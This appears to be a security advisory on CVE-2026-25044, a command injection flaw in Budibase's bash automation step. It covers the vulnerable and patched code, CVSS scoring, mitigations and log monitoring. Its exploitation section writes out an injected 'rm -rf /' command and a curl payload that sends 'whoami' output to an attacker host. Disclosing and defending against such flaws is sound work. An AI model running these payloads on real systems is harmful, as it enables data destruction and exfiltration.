CVE-2026-25044: Remote Code Execution via OS Command Injection in Budibase Bash Automations

Budibase is an open-source low-code platform designed to build internal tools and applications. The platform includes an automations feature that allows users to define custom workflows, including a specific "bash automation" step intended to execute administrative or utility scripts on the underlying server.

CVE-2026-25044 is an OS Command Injection vulnerability (CWE-78) located within this bash automation logic. The vulnerability affects all Budibase versions prior to 3.33.4. The core issue stems from improper neutralization of special elements used in an OS command, allowing malicious input to alter the execution context.

An attacker requires low privileges (PR:L) to exploit this vulnerability, specifically the ability to create or modify automations within the Budibase portal. Successful exploitation results in arbitrary code execution with the permissions of the Node.js process running the Budibase server application.

The vulnerability is located in the backend server's automation processing logic, specifically within the packages/server/src/automations/steps/bash.ts file. The application processes user-provided bash commands through a template interpolation function named processStringSync before execution.

This function handles template syntax elements but fails to sanitize standard shell metacharacters. The resulting string is subsequently passed directly to the Node.js execSync function. The execSync method inherently invokes a system shell (such as /bin/sh or cmd.exe) to execute the provided command string.

Because the input string is not strictly sanitized, the shell evaluates any injected metacharacters. An attacker can break out of the intended command structure using standard techniques like command substitution or statement termination, forcing the shell to execute secondary malicious binaries alongside or instead of the original script.

The vulnerable code path initiates execution without sanitizing the output from the template processor. The string generated by processStringSync is passed unmodified into execSync, granting the shell complete authority over interpretation.

// VULNERABLE: packages/server/src/automations/steps/bash.ts
const command = processStringSync(inputs.code, context)
 
let stdout, success = true
try {
  stdout = execSync(command, {
    timeout: environment.QUERY_THREAD_TIMEOUT,
  }).toString()
} catch (err) {
  // Error handling omitted
}

The patch introduced in version 3.33.4 completely eliminates the reliance on execSync. The developers transitioned to the spawn method, which avoids wrapping the command in a shell environment. Furthermore, they introduced a strict sanitizeCommand function to strip dangerous metacharacters prior to splitting the command into an argument array.

// PATCHED: packages/server/src/automations/steps/bash.ts
import { spawn } from "child_process"
 
function sanitizeCommand(input: string): string {
  return input.replace(/[;&|`$(){}[\]]/g, "").trim()
}
 
// Subsequent logic utilizes spawn(cmd, args) instead of execSync

This remediation addresses the flaw at two levels. First, the regex effectively neutralizes the primary vectors for command stacking and substitution. Second, replacing execSync with spawn prevents the host operating system from interpreting the input string as a multi-statement shell script, neutralizing residual shell execution risks.

Exploitation begins with the attacker authenticating to the Budibase portal using an account authorized to manage automations. The attacker navigates to the "Automations" section and either creates a new workflow or modifies an existing one to include a "Bash Script" execution step.

The attacker then supplies a malicious payload in the automation's input field. This payload utilizes shell metacharacters to execute unauthorized commands. For example, injecting ; rm -rf / ; terminates the preceding legitimate command and initiates the malicious payload.

If the script utilizes variables handled by the template engine, the attacker can manipulate those inputs. Supplying a variable value such as $(curl http://attacker.com/$(whoami)) triggers command substitution when evaluated by the shell.

Successful exploitation of CVE-2026-25044 grants the attacker complete control over the underlying system environment executing the Budibase server. The injected commands run within the context and permission scope of the Budibase application process.

The CVSS v4.0 base score of 8.7 reflects the critical severity of this flaw. The vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N highlights that the attack is executable over the network with low complexity, requiring only basic user privileges and resulting in high impact across confidentiality, integrity, and availability.

An attacker can leverage this initial access to read sensitive configuration files, modify internal databases, or establish persistence. If the Budibase instance is deployed without strict containerization or network segmentation, the compromised server serves as a pivot point for lateral movement into the broader enterprise network.

The definitive remediation for CVE-2026-25044 is to upgrade the Budibase deployment to version 3.33.4 or later. This version contains the necessary architectural changes to the automation step execution flow and the requisite input sanitization functions.

Organizations unable to apply the patch immediately should implement interim mitigations. Administrators can disable the "Bash Automation" step globally by modifying the Budibase environment variables, thus completely removing the vulnerable attack surface until patching is feasible.

Security teams should also review system logs for indicators of compromise. Monitoring should focus on unexpected child processes spawned by the Budibase server application, as well as the presence of shell metacharacters like $(, ;, or | within the recorded parameters of automation execution logs.